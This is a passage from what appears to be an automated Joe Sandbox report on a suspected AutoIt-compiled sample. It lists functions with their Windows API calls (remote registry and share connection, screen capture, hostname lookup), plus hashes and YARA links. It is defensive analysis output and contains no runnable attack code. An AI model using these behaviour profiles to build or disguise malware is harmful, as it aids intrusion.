                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0095FA2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 984253442-2268648507
                                          • Opcode ID: 980baa869aea581e4120709758b1799f5a3d0563d92d690c7c2d787cf244b5c7
                                          • Instruction ID: 030fb2ea21298e3e2c7938c3227e0b795fcd3b98508569541e3055a51a116123
                                          • Opcode Fuzzy Hash: 980baa869aea581e4120709758b1799f5a3d0563d92d690c7c2d787cf244b5c7
                                          • Instruction Fuzzy Hash: B4412A72C04119AECF04FBE0DD96EEEB778AF98321F500465B605B21D1EA356F09CB61
                                          Function 0098BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00989207,?,?), ref: 0098BA56
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BA6D
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BA78
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BA85
                                          • GlobalLock.KERNEL32(00000000), ref: 0098BA8E
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BA9D
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0098BAA6
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BAAD
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BABE
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00992CAC,?), ref: 0098BAD7
                                          • GlobalFree.KERNEL32(00000000), ref: 0098BAE7
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0098BB0B
                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0098BB36
                                          • DeleteObject.GDI32(00000000), ref: 0098BB5E
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0098BB74
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 738760c31e9598b7f8c4b61388186917b7308d632a53c816ed1ad0fb67ec6af2
                                          • Instruction ID: 792af69533eb46c307903ac7822f14c0d93faab5eb4c8b08f9f5a87e42cf4199
                                          • Opcode Fuzzy Hash: 738760c31e9598b7f8c4b61388186917b7308d632a53c816ed1ad0fb67ec6af2
                                          • Instruction Fuzzy Hash: 42412675614208EFDB21AF65DC98EAABBBCFB89711F144069F906D7360D7309E01EB60
                                          Function 0096D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                          Download Yara Rule
                                          APIs
                                          • __wsplitpath.LIBCMT ref: 0096DA10
                                          • _wcscat.LIBCMT ref: 0096DA28
                                          • _wcscat.LIBCMT ref: 0096DA3A
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0096DA4F
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DA63
                                          • GetFileAttributesW.KERNEL32(?), ref: 0096DA7B
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 0096DA95
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DAA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                          • String ID: *.*
                                          • API String ID: 34673085-438819550
                                          • Opcode ID: 7f830acc4a6acb3ca2b1708464166dc9a26731e1aa37409277749177e689154e
                                          • Instruction ID: e56d601fab2919f5c01911480de30b92dd0ebaf4c26c79439fa546301da53bb9
                                          • Opcode Fuzzy Hash: 7f830acc4a6acb3ca2b1708464166dc9a26731e1aa37409277749177e689154e
                                          • Instruction Fuzzy Hash: 6F818571A0A3419FCB24DF64C844A6AB7E8BF89350F188C2EF899CB251D734DD45CB52
                                          Function 0098C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0098C1FC
                                          • GetFocus.USER32 ref: 0098C20C
                                          • GetDlgCtrlID.USER32(00000000), ref: 0098C217
                                          • _memset.LIBCMT ref: 0098C342
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0098C36D
                                          • GetMenuItemCount.USER32(?), ref: 0098C38D
                                          • GetMenuItemID.USER32(?,00000000), ref: 0098C3A0
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0098C3D4
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0098C41C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0098C454
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0098C489
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 1296962147-4108050209
                                          • Opcode ID: f9ca78725c73e28924bf255982e5c49124c06d0ea03adbdfb04964d7748e1fa9
                                          • Instruction ID: d4af68ad64a836a08136c73f20ce6cbf499e77e9b9e44295cccef0d2cf463de4
                                          • Opcode Fuzzy Hash: f9ca78725c73e28924bf255982e5c49124c06d0ea03adbdfb04964d7748e1fa9
                                          • Instruction Fuzzy Hash: 2E818BB0608301AFD710EF24D894A7BBBE8FB88714F00492EF995973A1D770D945DB62
                                          Function 0097731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0097738F
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0097739B
                                          • CreateCompatibleDC.GDI32(?), ref: 009773A7
                                          • SelectObject.GDI32(00000000,?), ref: 009773B4
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00977408
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00977444
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00977468
                                          • SelectObject.GDI32(00000006,?), ref: 00977470
                                          • DeleteObject.GDI32(?), ref: 00977479
                                          • DeleteDC.GDI32(00000006), ref: 00977480
                                          • ReleaseDC.USER32(00000000,?), ref: 0097748B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 1c7c2576b68dda8058ebb134bee8438d6daf2135c51e3b0c6014b4c80908f037
                                          • Instruction ID: 5bbcf44253daa671debd310b46ec3cc2ef628b9725a6b9267ac5b977fad4f9d1
                                          • Opcode Fuzzy Hash: 1c7c2576b68dda8058ebb134bee8438d6daf2135c51e3b0c6014b4c80908f037
                                          • Instruction Fuzzy Hash: F5514776904309EFCB14CFA8DC85EAEBBB9EF48310F148529F95AA7351D731A940DB50
                                          Function 00906A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00920957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00906B0C,?,00008000), ref: 00920973
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00906BAD
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00906CFA
                                            • Part of subcall function 0090586D: _wcscpy.LIBCMT ref: 009058A5
                                            • Part of subcall function 0092363D: _iswctype.LIBCMT ref: 00923645
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-1018226102
                                          • Opcode ID: ac63a4c0464bd4a42ff39a59db37c2e926041a5d70c41ef6f9554fd1ac750768
                                          • Instruction ID: e34172824b159822576cf862a30e7f23b373130f4a6a5f10b8b3e0387b14c708
                                          • Opcode Fuzzy Hash: ac63a4c0464bd4a42ff39a59db37c2e926041a5d70c41ef6f9554fd1ac750768
                                          • Instruction Fuzzy Hash: 86027A705083419FC724EF24C891AAFBBE9AFD9314F14481DF59A972E2DB30E949CB52
                                          Function 00962D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00962D50
                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00962DDD
                                          • GetMenuItemCount.USER32(009C5890), ref: 00962E66
                                          • DeleteMenu.USER32(009C5890,00000005,00000000,000000F5,?,?), ref: 00962EF6
                                          • DeleteMenu.USER32(009C5890,00000004,00000000), ref: 00962EFE
                                          • DeleteMenu.USER32(009C5890,00000006,00000000), ref: 00962F06
                                          • DeleteMenu.USER32(009C5890,00000003,00000000), ref: 00962F0E
                                          • GetMenuItemCount.USER32(009C5890), ref: 00962F16
                                          • SetMenuItemInfoW.USER32(009C5890,00000004,00000000,00000030), ref: 00962F4C
                                          • GetCursorPos.USER32(?), ref: 00962F56
                                          • SetForegroundWindow.USER32(00000000), ref: 00962F5F
                                          • TrackPopupMenuEx.USER32(009C5890,00000000,?,00000000,00000000,00000000), ref: 00962F72
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00962F7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 3993528054-0
                                          • Opcode ID: f3a6f7cd4b5808dd89296caf99e9cc9ef9e7cc5336e0ab7d6ca17e01add9473e
                                          • Instruction ID: 3328c86ede89f4be5108f3e9f9f8a6b93fc4cc2fa3dcaf282e8cbae6d9d06b7f
                                          • Opcode Fuzzy Hash: f3a6f7cd4b5808dd89296caf99e9cc9ef9e7cc5336e0ab7d6ca17e01add9473e
                                          • Instruction Fuzzy Hash: 4D714B70605A05BFFB229F54DC59FAABF68FF44364F100226F625AA1E0C7766C60DB90
                                          Function 009577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • _memset.LIBCMT ref: 0095786B
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009578A0
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009578BC
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009578D8
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00957902
                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0095792A
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00957935
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0095793A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 1411258926-22481851
                                          • Opcode ID: 87bc5a169c361506adb8cae7249ec15b666527e9f338e02d31c37ce7deaa2920
                                          • Instruction ID: 199814fd77c4a7a76bd4185323798a6507abc8be0e03c838f4a0a2a7a0b71239
                                          • Opcode Fuzzy Hash: 87bc5a169c361506adb8cae7249ec15b666527e9f338e02d31c37ce7deaa2920
                                          • Instruction Fuzzy Hash: 0D41F972C14229AFDF11EFE4EC95EEEF778BF44714B404169E915A32A1DA315E08CBA0
                                          Function 00980E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097FDAD,?,?), ref: 00980E31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: fd070ba4a1e1aebab796c927922b26a44226c4e9600f86b218ca930bdd8e15b5
                                          • Instruction ID: 7543a00929bf7271b36bd0c00f63cd36b011fd6c307da3027d79edcf5ffc9b38
                                          • Opcode Fuzzy Hash: fd070ba4a1e1aebab796c927922b26a44226c4e9600f86b218ca930bdd8e15b5
                                          • Instruction Fuzzy Hash: 55416C3111035A8FCF60EF50E996AEF37A4AFD1314F544424FE651B3A6DB34A91ACB60
                                          Function 0095F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0093E2A0,00000010,?,Bad directive syntax error,0098F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0095F7C2
                                          • LoadStringW.USER32(00000000,?,0093E2A0,00000010), ref: 0095F7C9
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • _wprintf.LIBCMT ref: 0095F7FC
                                          • __swprintf.LIBCMT ref: 0095F81E
                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0095F88D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 1506413516-4153970271
                                          • Opcode ID: 3c842156ab18ae8576d8aa45fec9786aa0f4bad8c36f5d4a46b890823d4cdc32
                                          • Instruction ID: 65701d9f12126bc4edee0719375a5591097ce8265032c2bed513ac43d2c5d42b
                                          • Opcode Fuzzy Hash: 3c842156ab18ae8576d8aa45fec9786aa0f4bad8c36f5d4a46b890823d4cdc32
                                          • Instruction Fuzzy Hash: 6C214A3290421EBFCF11EF90CC1AFEE7739BF58324F044865F515661A1EA35AA18DB50
                                          Function 009652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                            • Part of subcall function 00907924: _memmove.LIBCMT ref: 009079AD
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00965330
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00965346
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00965357
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00965369
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0096537A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: 0bb15487d5e398db0e4614bfb71f940208cc3ccfb9e94d5f9b1432aea95d8895
                                          • Instruction ID: d4c9e0b27434a4c27497cbde7d91c7b5080f542855ee347a4b2252daf2b562a2
                                          • Opcode Fuzzy Hash: 0bb15487d5e398db0e4614bfb71f940208cc3ccfb9e94d5f9b1432aea95d8895
                                          • Instruction Fuzzy Hash: C8118271E50169BDD724B6A1CC4AEFFBB7CEBD5F68F500429B411A21E1EEA01D05C6A0
                                          Function 009646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: d2adc70614b0448640d3ba543cd766422ee3e4e8b49181de5fcfee257b01208b
                                          • Instruction ID: 62064b55f317a24d59ef963b3b60215d7440debcaec99c504f9fbef444884829
                                          • Opcode Fuzzy Hash: d2adc70614b0448640d3ba543cd766422ee3e4e8b49181de5fcfee257b01208b
                                          • Instruction Fuzzy Hash: 8411E431504114AFDB20AB70AC4AFEA77BCEF82711F0401B6F449961A1EF75CAC19B50
                                          Function 00964F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • timeGetTime.WINMM ref: 00964F7A
                                            • Part of subcall function 0092049F: timeGetTime.WINMM(?,76C1B400,00910E7B), ref: 009204A3
                                          • Sleep.KERNEL32(0000000A), ref: 00964FA6
                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00964FCA
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00964FEC
                                          • SetActiveWindow.USER32 ref: 0096500B
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00965019
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00965038
                                          • Sleep.KERNEL32(000000FA), ref: 00965043
                                          • IsWindow.USER32 ref: 0096504F
                                          • EndDialog.USER32(00000000), ref: 00965060
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: 4a16a09c39ce3b39785ae3c1624d26d0b2eb37f70a81fd0f0029fb2a0f813268
                                          • Instruction ID: 5b940ed4038e10ebe2c1130e8e782fa0c176f8c49d32c9c41ccc3fd0e295a135
                                          • Opcode Fuzzy Hash: 4a16a09c39ce3b39785ae3c1624d26d0b2eb37f70a81fd0f0029fb2a0f813268
                                          • Instruction Fuzzy Hash: 3821C070A2C605AFE7105F70ED99F263BADEB44745F252024F106822B1DB718D50FB61
                                          Function 0096D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • CoInitialize.OLE32(00000000), ref: 0096D5EA
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0096D67D
                                          • SHGetDesktopFolder.SHELL32(?), ref: 0096D691
